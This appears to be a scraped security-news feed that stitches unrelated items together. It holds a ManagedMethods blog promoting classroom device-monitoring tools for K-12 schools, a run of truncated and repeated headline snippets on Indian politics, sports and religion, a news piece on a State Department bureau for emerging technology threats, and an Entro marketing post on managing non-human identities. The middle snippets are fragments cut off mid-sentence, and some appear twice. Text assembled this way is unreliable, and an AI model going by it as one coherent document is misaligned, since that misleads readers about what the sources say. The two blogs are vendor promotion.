Technology

<p>Technology has transformed modern classrooms, opening the door to more interactive and collaborative learning experiences. However, it has also introduced new challenges for teachers. Student devices are essential for digital learning, but can quickly become sources of distraction during instruction, pulling attention away from lessons and disrupting classroom flow.</p><p>Without the right support, teachers often lose valuable instructional time redirecting attention, monitoring screens, and managing off-task behavior. These small interruptions add up, making it harder to maintain momentum and keep students engaged.</p><p>Modern <a href="https://managedmethods.com/blog/product-update-classroom-manager-google-classroom-management/">classroom management tools</a> for teachers are designed to solve this problem. By giving educators better visibility into student activity and simple ways to guide focus, these tools help reduce disruptions and create more productive learning environments.</p><p>In this blog, we’ll explore how classroom management tools help teachers reclaim instructional time, and what to look for when evaluating the best classroom management and student engagement tools from edtech vendors.</p><p><strong>Key Points</strong></p><ul class="wp-block-list"> <li>Student devices enhance learning, but also introduce constant digital distractions</li> <li>Small disruptions quickly add up, reducing valuable instructional time</li> <li>Teachers need better visibility and control without added complexity</li> <li>Classroom management tools help minimize distractions and keep students focused</li> <li>Real-time monitoring and simple controls improve classroom efficiency</li> <li>The best classroom management tools for teachers support instruction, not interrupt it</li> </ul><h2 class="wp-block-heading" id="h-the-growing-challenge-of-digital-distractions-in-the-classroom-nbsp">The Growing Challenge of Digital Distractions in the Classroom </h2><p>One-to-one device programs have become increasingly common in K–12 schools, with many districts providing every student access to a Chromebook, tablet, or laptop. These initiatives have expanded opportunities for digital learning, enabling real-time collaboration, personalized instruction, and access to a wide range of online resources. However, with constant device access also comes greater potential for distraction, making it more challenging for teachers to keep students focused during instructional time.</p><p>With constant access to the internet, students are only a click away from distractions like online games, social media platforms, video content, and unrelated web browsing. Even during structured lessons, it’s easy for students to drift off-task without immediate visibility or guidance. These distractions may seem minor in isolation, but they can quickly disrupt focus, reduce engagement, and impact overall learning outcomes. This is especially chaotic when multiple students are off-task at the same time.</p><p>Even brief moments of distraction can have a cumulative impact on instructional time. When a teacher has to pause a lesson to redirect a student, address off-task behavior, or regain the class’s attention, it interrupts the flow of instruction. Over the course of a single class period or an entire school day, these small disruptions add up, reducing the time available for meaningful teaching and learning.</p><p>At the same time, teachers are expected to actively monitor student device use while delivering instruction, answering questions, and managing the classroom. This balancing act can be overwhelming without the right support. Instead of focusing fully on teaching, educators are often forced to split their attention between instruction and supervision.</p><p>Without effective classroom management tools for teachers, managing digital distractions can pull educators away from what matters most: delivering engaging lessons and supporting student success.</p><p><a href="https://cta-service-cms2.hubspot.com/web-interactives/public/v1/track/click?encryptedPayload=AVxigLKfg167xg5iFjpStSMQNynNCNGjZUXoBbu3BVUL05IoEAQyg8zHQUzXV5TXnri1WWtu8bJepQBtQ6tokELBN1NtQvTmK0a8MOpA6tk%2FMhlinBMUys%2F%2F29XKF8pSIWlwGh%2F5Og1d%2B708DPJsS9K6gQMhcdFj94Yu%2F887ISWREyIhZ3%2FU5VsWrLyntV4i0xI%3D&amp;portalId=6834707">Sign up now! –&gt; FREE Proof-of-Concept, Experience how Cloud Monitor, Content Filter, and Classroom Manager work together in your environment –&gt; </a></p><h2 class="wp-block-heading" id="h-what-are-classroom-management-tools-for-teachers">What Are Classroom Management Tools for Teachers?</h2><p>Classroom management tools for teachers are software solutions designed to help educators effectively manage student device use during instruction. As technology becomes more embedded in daily learning, these tools give teachers the ability to monitor and guide how devices are being used in real time, ensuring they support, not distract from, the lesson. Classroom management tools for teachers might include:</p><ul class="wp-block-list"> <li>Screen monitoring tools for real-time class supervision</li> <li>Website and app control tools to block or limit access</li> <li>Screen sharing tools to broadcast a screen or share student work</li> <li>Device locking tools that can pause student devices</li> <li>Messaging and alert tools to communicate with students during class</li> <li>Tab and browser management tools to keep students on task</li> <li>Device management platforms to control settings and permissions</li> <li>Behavior tracking tools for rewards and parent reports</li> </ul><p>At their core, classroom management tools help teachers maintain student focus without constant redirection. Instead of repeatedly pausing instruction to address off-task behavior, educators can use these tools to proactively keep students engaged, creating a more structured and productive learning environment.</p><h3 class="wp-block-heading" id="h-core-capabilities-nbsp">Core Capabilities </h3><p><strong>Real-Time Student Screen Visibility: </strong>Teachers can view student device activity as it happens, giving them immediate insight into who is on-task and who may be distracted. This eliminates guesswork and allows educators to quickly identify issues without interrupting the flow of instruction.</p><p><strong>Ability to Redirect or Limit Online Activity:</strong> Modern classroom management tools allow teachers to restrict access to certain websites or apps during class time. If a student navigates away from the assigned task, teachers can easily redirect them, helping minimize distractions and keep learning on track.</p><p><strong>Tools to Guide Attention During Lessons: </strong>These tools make it easier to direct student focus when it matters most. Teachers can guide students to specific resources, highlight key content, or ensure everyone is following along with the lesson, creating a more unified and engaged classroom experience.</p><p><strong>Quick Ways to Regain Classroom Focus: </strong>When distractions do occur, teachers need fast, simple ways to bring attention back to the lesson. Classroom management tools provide immediate controls that help refocus students without disrupting instruction, allowing teachers to maintain momentum and maximize instructional time.</p><h2 class="wp-block-heading" id="h-4-ways-modern-classroom-management-tools-reclaims-instructional-time">4 Ways Modern Classroom Management Tools Reclaims Instructional Time</h2><h3 class="wp-block-heading" id="h-1-real-time-visibility-into-student-activity-nbsp">1. Real-Time Visibility Into Student Activity </h3><p>One of the most impactful ways classroom management tools for teachers help reclaim instructional time is through real-time visibility into student activity. Instead of guessing who is on-task or walking around the classroom to check screens, teachers can instantly see what students are doing on their devices from a single view.</p><p>This immediate insight eliminates time-consuming monitoring and allows teachers to quickly identify and address off-task behavior. As a result, educators can spend less time policing device use and more time focused on delivering instruction and supporting student learning.</p><h3 class="wp-block-heading" id="h-2-reducing-digital-distractions">2. Reducing Digital Distractions</h3><p>Another key way classroom management tools help teachers reclaim instructional time is by reducing digital distractions before they escalate. With the ability to limit access to non-educational websites or apps during lessons, teachers can create a more focused digital learning environment.</p><p>By proactively keeping students on the right content, these tools help maintain attention on learning activities and prevent small distractions from turning into larger classroom disruptions. This means fewer interruptions, smoother lessons, and more time spent on meaningful instruction.</p><h3 class="wp-block-heading" id="h-3-refocusing-students-quickly-nbsp">3. Refocusing Students Quickly </h3><p>Modern classroom management tools for teachers make it easy to quickly refocus students without disrupting the flow of a lesson. With simple, intuitive controls, teachers can redirect student screens back to the appropriate content in just a few clicks.</p><p>This ability to act quickly helps maintain instructional momentum and minimizes time spent addressing off-task behavior. Instead of pausing to manage distractions, teachers can seamlessly guide students back on track and keep the lesson moving forward.</p><h3 class="wp-block-heading" id="h-4-supporting-student-engagement-nbsp">4. Supporting Student Engagement </h3><p>Effective classroom management tools do more than reduce distractions. They actively support student engagement. By keeping students focused on assigned tasks and minimizing opportunities for off-task behavior, these tools help create a more structured and attentive learning environment.</p><p>As a result, teachers can spend more time teaching and less time troubleshooting distractions. This shift not only improves the flow of instruction but also boosts overall classroom productivity, allowing both teachers and students to make the most of every learning moment.</p><p><a href="https://cta-service-cms2.hubspot.com/web-interactives/public/v1/track/click?encryptedPayload=AVxigLKfg167xg5iFjpStSMQNynNCNGjZUXoBbu3BVUL05IoEAQyg8zHQUzXV5TXnri1WWtu8bJepQBtQ6tokELBN1NtQvTmK0a8MOpA6tk%2FMhlinBMUys%2F%2F29XKF8pSIWlwGh%2F5Og1d%2B708DPJsS9K6gQMhcdFj94Yu%2F887ISWREyIhZ3%2FU5VsWrLyntV4i0xI%3D&amp;portalId=6834707">Sign up now! –&gt; FREE Proof-of-Concept, Experience how Cloud Monitor, Content Filter, and Classroom Manager work together in your environment –&gt; </a></p><h2 class="wp-block-heading" id="h-how-to-find-the-best-classroom-management-and-student-engagement-tools-from-edtech-vendors">How to Find the Best Classroom Management and Student Engagement Tools from EdTech Vendors</h2><p>When evaluating the best classroom management and student engagement tools from edtech vendors, schools should prioritize solutions that are both simple and effective. The right tools should support teachers in the classroom without adding complexity, ensuring they are easy to use while delivering meaningful impact on focus and instructional time.</p><h3 class="wp-block-heading" id="h-key-features-to-look-for">Key Features to Look For</h3><ul class="wp-block-list"> <li>Real-time visibility into student device activity</li> <li>Easy-to-use controls for teachers</li> <li>Quick setup without complex installations</li> <li>Tools designed specifically for K–12 classrooms</li> <li>Integration with existing school technology environments</li> </ul><p>The best classroom management tools for teachers are designed to support instruction, not complicate it. They should be intuitive for educators to use with minimal training, while also being easy for IT teams to deploy and manage across the district. Solutions that require complex setups, constant maintenance, or steep learning curves can create more challenges than they solve. Instead, schools should look for tools that seamlessly fit into existing workflows, helping teachers manage digital learning environments effectively without adding extra burden on their day or on IT resources.</p><h2 class="wp-block-heading" id="h-how-classroom-management-tools-improve-the-teaching-experience-nbsp">How Classroom Management Tools Improve the Teaching Experience </h2><h3 class="wp-block-heading" id="h-benefits-for-teachers-nbsp">Benefits for Teachers </h3><p>Modern classroom management tools for teachers are designed to make daily instruction smoother, not more complicated. One of the biggest advantages is the ability for teachers to block or allow specific URLs based on their lesson needs, without having to rely on IT teams. This flexibility empowers educators to quickly adapt to different activities, projects, or teaching moments in real time.</p><p>These tools also help reduce classroom interruptions by minimizing off-task behavior before it escalates. With fewer distractions to manage, teachers can maintain lesson flow and spend more time focused on instruction rather than redirection. As a result, educators experience less stress when managing student devices and feel more in control of their digital classrooms.</p><p>Over time, this leads to greater confidence in using technology as part of everyday teaching. Instead of viewing devices as a challenge to manage, teachers can leverage them as effective learning tools that enhance engagement and support better outcomes.</p><h3 class="wp-block-heading" id="h-benefits-for-students">Benefits for Students</h3><p>Modern classroom management tools don’t just support teachers; they also create a better learning experience for students. By minimizing distractions and keeping device use aligned with the lesson, these tools help establish more focused learning environments where students can fully engage with the material.</p><p>They also provide clear expectations around how devices should be used during class. When students understand boundaries and stay on task, it reduces confusion and creates a more structured, productive classroom. As a result, students are more engaged during instruction, better able to follow along, and more likely to retain what they’ve learned.</p><h3 class="wp-block-heading" id="h-benefits-for-it-teams-nbsp">Benefits for IT Teams </h3><p>The right classroom management tools for teachers also reduce the burden on IT teams. When teachers can independently allow or block URLs for specific lessons or student needs, it significantly decreases the number of support tickets related to access requests or student device issues. This self-service capability helps streamline day-to-day operations across the district.</p><p>With fewer routine requests to manage, IT teams can shift their focus and energy toward higher-priority initiatives rather than handling constant classroom-level adjustments. This includes improving infrastructure, strengthening security, and supporting broader technology goals.</p><h2 class="wp-block-heading" id="h-reclaim-instructional-time-with-the-right-classroom-management-tools-nbsp">Reclaim Instructional Time With the Right Classroom Management Tools </h2><p>Effective classroom technology should support teachers, not create additional work. The right classroom management tools for teachers simplify the challenges of managing digital learning environments by reducing distractions, streamlining classroom control, and keeping students focused and engaged.</p><p>When schools invest in <a href="https://managedmethods.com/blog/k12-classroom-management-and-content-filtering/">the best classroom management and student engagement tools from edtech vendors</a>, they empower educators to spend less time managing devices and more time delivering impactful instruction. Ultimately, that means more productive classrooms, stronger learning outcomes, and more time for teachers to focus on what matters most: helping students succeed.</p><p><a href="https://managedmethods.com/products/classroom-manager/">Classroom Manager</a> by ManagedMethods brings these capabilities together in a simple, teacher-friendly solution built specifically for K–12 environments. With real-time visibility, easy-to-use controls, and seamless deployment, it helps educators reduce distractions, keep students focused, and reclaim valuable instructional time. It does so without adding complexity for teachers or IT teams. Ready to see the difference for yourself? Learn more about Classroom Manager and experience it in action by <a href="https://managedmethods.com/schedule-a-demo/">booking a free proof-of-concept</a> today.</p><figure class="wp-block-image"><img decoding="async" src="https://no-cache.hubspot.com/cta/default/6834707/interactive-206308997434.png" alt="CTA - BLOG - Free POC"></figure><p><a href="https://cta-service-cms2.hubspot.com/web-interactives/public/v1/track/redirect?encryptedPayload=AVxigLKCy9wzK8SlxZM4tgKzA19SWgtFk9OwVgJ%2F5cMyrGhpWncCcof2yVeXqZuukzjgX1LFmTeA13sYXfGiVMsmF5R%2FQy4Wo5YiA%2FIlUxjVakj9WkQEjiSQP7240NgO0ukBPhQtka9I3gxDLCvztTM5qHox9wtT0rFfR7hwtBBbQUEJcTzMuJxBCFO8fP4S8gA%3D&amp;webInteractiveContentId=206308997434&amp;portalId=6834707" rel="noreferrer noopener"></a></p><p>The post <a href="https://managedmethods.com/blog/how-modern-classroom-management-tools-help-teachers-reclaim-instructional-time/">How Modern Classroom Management Tools Help Teachers Reclaim Instructional Time</a> appeared first on <a href="https://managedmethods.com/">ManagedMethods Cybersecurity, Safety &amp; Compliance for K-12</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/how-modern-classroom-management-tools-help-teachers-reclaim-instructional-time/" data-a2a-title="How Modern Classroom Management Tools Help Teachers Reclaim Instructional Time"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-modern-classroom-management-tools-help-teachers-reclaim-instructional-time%2F&amp;linkname=How%20Modern%20Classroom%20Management%20Tools%20Help%20Teachers%20Reclaim%20Instructional%20Time" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-modern-classroom-management-tools-help-teachers-reclaim-instructional-time%2F&amp;linkname=How%20Modern%20Classroom%20Management%20Tools%20Help%20Teachers%20Reclaim%20Instructional%20Time" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-modern-classroom-management-tools-help-teachers-reclaim-instructional-time%2F&amp;linkname=How%20Modern%20Classroom%20Management%20Tools%20Help%20Teachers%20Reclaim%20Instructional%20Time" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-modern-classroom-management-tools-help-teachers-reclaim-instructional-time%2F&amp;linkname=How%20Modern%20Classroom%20Management%20Tools%20Help%20Teachers%20Reclaim%20Instructional%20Time" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-modern-classroom-management-tools-help-teachers-reclaim-instructional-time%2F&amp;linkname=How%20Modern%20Classroom%20Management%20Tools%20Help%20Teachers%20Reclaim%20Instructional%20Time" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://managedmethods.com/feed/">ManagedMethods Cybersecurity, Safety &amp;amp; Compliance for K-12</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alexa Sander">Alexa Sander</a>. Read the original post at: <a href="https://managedmethods.com/blog/how-modern-classroom-management-tools-help-teachers-reclaim-instructional-time/">https://managedmethods.com/blog/how-modern-classroom-management-tools-help-teachers-reclaim-instructional-time/</a> </p>

<ul><li>News</li> <li>PM Modi remains world's most popular leader, says study by US firm</li></ul> Follow Us On Social Media March Madness coach Bryan Hodgson goes viral for recruiting his wife jo… [+1653 chars]

Follow Us On Social Media March Madness coach Bryan Hodgson goes viral for recruiting his wife joke during Providence Friars introduction press conferenceZack Short traded for cash to Washington Nat… [+1552 chars]

Follow Us On Social Media March Madness coach Bryan Hodgson goes viral for recruiting his wife joke during Providence Friars introduction press conferenceZack Short traded for cash to Washington Nat… [+1552 chars]

<ul><li>News</li> <li>'It's not must': SC nixes plea against Vande Mataram circular</li></ul> Follow Us On Social Media India tightens digital security with strict rules'Harry Potter' teaser TROLL… [+1578 chars]

<ul><li>News</li> <li>India News</li> <li>Amid oppn protest, FCRA amendment bill tabled in Lok Sabha</li></ul> Follow Us On Social Media India tightens digital security with strict rules'Harry Po… [+1596 chars]

<ul><li>News</li> <li>India News</li> <li>PG admission row: Petitioner contacts CJI kin amid SC heat</li></ul> Follow Us On Social Media India tightens digital security with strict rules'Harry Po… [+1596 chars]

Follow Us On Social Media Soon, biometric check for land compensationWho is Mo Salah's wife Magi Sadeq? Premier League stars childhood love who stayed before fame and avoids spotlightFinancial burde… [+1535 chars]

With Immigration and Customs Enforcement agents deployed to more than a dozen airports across the U.S. and border device searches growing increasingly common, its more important than ever to consider… [+6224 chars]

<ul><li>News</li> <li>Religion News</li> <li>Sunrise and Sunset Time on March 26, 2026: Worship Lord Surya and perform kanya pujan on ashtami tithi</li></ul> Follow Us On Social Media India tight… [+1643 chars]

<p>The State Department has officially operationalized the Bureau of Emerging Threats (ET), a high-stakes unit designed to shield American interests from the weaponization of advanced technology by foreign adversaries.</p><p>The bureau’s launch marks the culmination of a sweeping reorganization plan introduced nearly a year ago by Secretary of State Marco Rubio. While its existence was previously known, officials have now revealed the specific architecture of the agency, which is tasked with countering sophisticated threats from China, Russia, North Korea, Iran, and international terrorist organizations.</p><p>Led by senior career diplomat Anny Vu, formerly the U.S. chargé d’affaires to China, the bureau will leverage foreign policy to mitigate risks that “blur the line between peace and conflict.” The agency is structured into five specialized offices: cybersecurity, critical infrastructure security, disruptive technology targeting artificial intelligence (AI) and quantum computing, space security, and threat assessment.</p><p>“The bureau will address not only the current threats we face today in cyberspace and outer space… but those we will face in the decades ahead,” said State Department spokesperson Tommy Pigott.</p><p>The rollout follows a surge in digital hostilities. Experts at CrowdStrike Inc. have noted a significant uptick in pro-Iranian cyber activity following military escalations in February. Specifically, the Cybersecurity and Infrastructure Security Agency (CISA) is currently investigating a major breach of the medical technology firm Stryker, believed to be the work of Iranian-linked hackers.</p><p>The bureau’s activation coincides with a new White House national policy framework for AI. This four-page blueprint urges Congress to adopt “minimally burdensome” federal laws to preempt restrictive state-level regulations, while explicitly advising against the creation of new federal agencies dedicated solely to AI regulation.</p><p>While the State Department has yet to disclose the bureau’s exact budget or staffing levels, officials emphasize a shift toward proactive diplomacy. Rather than merely reacting to breaches, the ET Bureau is designed to anticipate how emerging technologies might be used for espionage or sabotage before they reach a crisis point.</p><p>The bureau currently reports to the Under Secretary for Arms Control and International Security, signaling that the U.S. now views bits, bytes, and orbital assets as central to the modern arms race.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/state-department-launches-new-bureau-to-combat-high-tech-threats/" data-a2a-title="State Department Launches New Bureau to Combat High-Tech Threats"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fstate-department-launches-new-bureau-to-combat-high-tech-threats%2F&amp;linkname=State%20Department%20Launches%20New%20Bureau%20to%20Combat%20High-Tech%20Threats" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fstate-department-launches-new-bureau-to-combat-high-tech-threats%2F&amp;linkname=State%20Department%20Launches%20New%20Bureau%20to%20Combat%20High-Tech%20Threats" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fstate-department-launches-new-bureau-to-combat-high-tech-threats%2F&amp;linkname=State%20Department%20Launches%20New%20Bureau%20to%20Combat%20High-Tech%20Threats" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fstate-department-launches-new-bureau-to-combat-high-tech-threats%2F&amp;linkname=State%20Department%20Launches%20New%20Bureau%20to%20Combat%20High-Tech%20Threats" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fstate-department-launches-new-bureau-to-combat-high-tech-threats%2F&amp;linkname=State%20Department%20Launches%20New%20Bureau%20to%20Combat%20High-Tech%20Threats" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<h2>What Does Scalable AI Security Mean for Non-Human Identities?</h2><p>When organizations increasingly transition to the cloud, the question that arises is: How well-equipped is your AI security to handle evolving Non-Human Identities (NHIs)? NHIs, or machine identities, have become pivotal, serving as significant assets in protecting data and systems from unauthorized access.</p><h3>Understanding Non-Human Identities</h3><p>NHIs are essentially the machine identities that secure digital interactions between various systems. Each NHI is created by combining a “secret” (an encrypted password, token, or key) with the permissions a server grants, akin to a passport with a visa. This concept is vital for organizations aiming to protect assets.</p><p>The task of managing NHIs involves a comprehensive oversight of the entire lifecycle, including discovery, classification, threat detection, and remediation. Unlike traditional point solutions, this all-encompassing approach offers a definitive edge, providing deeper insights into ownership, permissions, usage patterns, and potential vulnerabilities.</p><h3>The Strategic Significance of Scalable AI Security</h3><p>For organizations across industries such as financial services, healthcare, and DevOps, the strategic implementation of scalable AI security is imperative. Here’s why:</p><ul> <li><strong>Reduced Risk:</strong> By proactively identifying security risks, NHI management minimizes the likelihood of breaches.</li> <li><strong>Enhanced Compliance:</strong> Automating policy enforcement and maintaining audit trails helps organizations meet compliance requirements efficiently.</li> <li><strong>Operational Efficiency:</strong> Automation within NHI management allows teams to focus on strategic initiatives, driving efficiency.</li> <li><strong>Improved Visibility:</strong> A centralized view of management and governance facilitates enhanced control over access.</li> <li><strong>Cost Savings:</strong> Automation of secrets rotation and decommissioning of NHIs helps cut operational costs significantly.</li> </ul><h3>Bridging the Gap Between Security and R&amp;D Teams</h3><p>A common challenge in organizations is the disconnect between security and R&amp;D teams. By implementing robust NHI management, this gap can be addressed effectively. The <a href="https://entro.security/blog/non-human-identities-security-in-healthcare/">secure management of NHIs in healthcare</a> is a prime example of how various sectors can benefit from this strategic alignment.</p><p>NHI management also fosters a collaborative atmosphere where security is integrated into the development lifecycle, empowering teams to innovate without compromising secure scaling.</p><h3>A Data-Driven Approach to Secure Scaling</h3><p>Incorporating a data-driven strategy in scalable AI security is essential. Businesses must harness data analytics to predict potential vulnerabilities and address them before they escalate. The ability to analyze and act on insights regarding NHIs strengthens a company’s security posture considerably, enabling secure scaling of AI systems across platforms.</p><p>By leveraging machine learning and AI, organizations can automate the management of NHIs and secrets, which translates to more efficient and adaptive security measures. An exemplary case is how companies like Elastic scale their secrets and NHI security, as outlined in <a href="https://entro.security/blog/how-elastic-scaled-secrets-nhi-security-elastics-playbook-from-visibility-to-automation/">Elastic’s playbook for visibility to automation</a>.</p><h3>Relevance Across Industries</h3><p>While the need for scalable AI security is universal, the specifics can vary across different sectors. For instance, in financial services sector, protecting NHIs is crucial due to sensitive data handling. In healthcare, it’s about safeguarding patient information and ensuring compliance with regulations like HIPAA.</p><p>Travel and SOC teams, on the other hand, require meticulous access management and continuous monitoring of NHIs due to the dynamic nature of their operations. These industry-specific needs underline the importance of a versatile approach to secure scaling.</p><p>In conclusion, when organizations increasingly operate in cloud environments, the integration of scalable AI security with robust NHI management is no longer optional; it’s a necessity. Addressing the complexities of machine identities and secrets through a comprehensive methodology empowers businesses to innovate securely, ensuring both compliance and risk reduction.</p><p>Stay tuned for the continuation of this exploration into the strategic implementation of scalable AI security.</p><h3>The Imperative of Continuous Monitoring</h3><p>Why is continuous monitoring a cornerstone for managing NHIs? It plays an indispensable role in identifying and mitigating threats in real time, ensuring no unauthorized activity goes unnoticed. Such vigilance is crucial for maintaining the integrity of systems that depend on NHIs.</p><p>The traditional methods of securing identities were reactive, addressing threats post-breach. However, with the dynamic risks associated with NHIs, a proactive approach is necessary. Continuous monitoring serves as an early warning system, highlighting anomalies in behavior patterns and unusual access requests. This real-time oversight allows teams to tackle potential security breaches before they manifest, safeguarding organizations against substantial losses and reputational damage.</p><p>Moreover, continuous monitoring aids compliance efforts by providing a comprehensive audit trail. It serves as documented proof of an organization’s proactive security stance, making compliance with regulations such as GDPR, HIPAA, and others more attainable.</p><h3>Building a Culture of Security</h3><p>Can organizations build a culture of security where every team understands and participates in maintaining NHI security? The answer is a resounding yes, though it requires a concerted effort to foster collaboration and communication among all departments.</p><p>The synergy between security teams and other departments, particularly R&amp;D, is crucial for a robust security culture. This collaboration ensures that security measures are seamlessly integrated into the development processes, rather than being an afterthought. The implementation of security measures at each stage of development not only strengthens the overall security posture but also empowers teams to innovate with peace of mind, knowing they are not compromising on safety.</p><p>To further embed this culture, organizations should invest in continuous training and awareness programs tailored to specific roles. By deepening their understanding of NHIs and the significance of managing these digital identities, employees across all levels can contribute to an organization’s cybersecurity resilience. Implementing gamified security training can make learning more engaging and impactful.</p><h3>The Role of AI and Machine Learning</h3><p>How do AI and machine learning revolutionize the way organizations manage NHIs? They bring automation and intelligent analysis to the forefront, transforming the approach from manual and reactive to automated and predictive.</p><p>Artificial Intelligence has the unique ability to process vast amounts of data quickly, detecting patterns and anomalies that may indicate a security breach. Machine learning algorithms learn from each interaction, becoming more accurate in predicting and identifying threats when they evolve. This predictive capacity is crucial for fortifying systems against emerging threats and ensuring NHIs remain secure.</p><p>Furthermore, AI-driven solutions can automate routine tasks such as secrets rotation and identity verification, freeing up valuable resources for more strategic initiatives. This not only maximizes operational efficiency but also minimizes the risk of human error, which is often a vulnerability in cybersecurity protocols.</p><p>Given these capabilities, it’s no surprise that organizations leveraging AI and machine learning in their NHI management strategies are better positioned to preempt threats and operate securely.</p><h3>Future-Ready Solutions for Comprehensive Security</h3><p>What does it take for businesses to stay ahead? Future-ready solutions that adapt to evolving threats are paramount. Organizations must be prepared to scale their security operations in tandem with their business growth, ensuring that all machine identities and secrets are protected, regardless of size or complexity.</p><p>Incorporating an adaptable security framework is essential. This includes deploying security solutions that can be fine-tuned to meet specific industry requirements and scale up or down as necessary. Solutions must accommodate new technologies and platforms, integrating smoothly into existing systems to prevent security gaps.</p><p>Moreover, the shift toward using decentralized systems and infrastructures such as blockchain can enhance security by reducing single points of failure. While exploring these technologies, businesses should ensure that NHIs are adequately managed and secured within these networks.</p><p>Lastly, fostering partnerships with industry experts and participating in collaborative platforms can provide essential insights into best practices and emerging trends. For example, organizations can benefit from collaborative research efforts, as detailed in the <a href="https://entro.security/blog/agentic-ai-owasp-research/">Agentic AI OWASP research</a> on emerging security technologies.</p><h3>The Strategic Path Forward</h3><p>Addressing the complexities of managing non-human identities is a multi-faceted challenge that requires a strategic, comprehensive approach. The integration of scalable AI security and NHI management empowers businesses to not only protect their digital assets but also innovate securely—a necessary balance.</p><p>Where the demand for robust, adaptable, and efficient security solutions continues to grow, the adoption of cutting-edge technologies and methodologies becomes imperative. This ongoing evolution necessitates staying informed, vigilant, and prepared to adapt at a moment’s notice. Organizations must continue to refine their strategies, incorporating insights from data-driven analyses, to successfully navigate the intricate web of non-human identities and remain secure.</p><p>Explore more about these strategies and how they can be applied within your organization by visiting our insights on <a href="https://entro.security/blog/entro-wiz-integration/">NHI management and cloud integrations</a> and our experience in AI in security professions.</p><p>The post <a href="https://entro.security/is-your-ai-security-scalable/">Is your AI security scalable?</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/is-your-ai-security-scalable/" data-a2a-title="Is your AI security scalable?"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fis-your-ai-security-scalable%2F&amp;linkname=Is%20your%20AI%20security%20scalable%3F" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fis-your-ai-security-scalable%2F&amp;linkname=Is%20your%20AI%20security%20scalable%3F" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fis-your-ai-security-scalable%2F&amp;linkname=Is%20your%20AI%20security%20scalable%3F" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fis-your-ai-security-scalable%2F&amp;linkname=Is%20your%20AI%20security%20scalable%3F" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fis-your-ai-security-scalable%2F&amp;linkname=Is%20your%20AI%20security%20scalable%3F" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alison Mack">Alison Mack</a>. Read the original post at: <a href="https://entro.security/is-your-ai-security-scalable/">https://entro.security/is-your-ai-security-scalable/</a> </p>

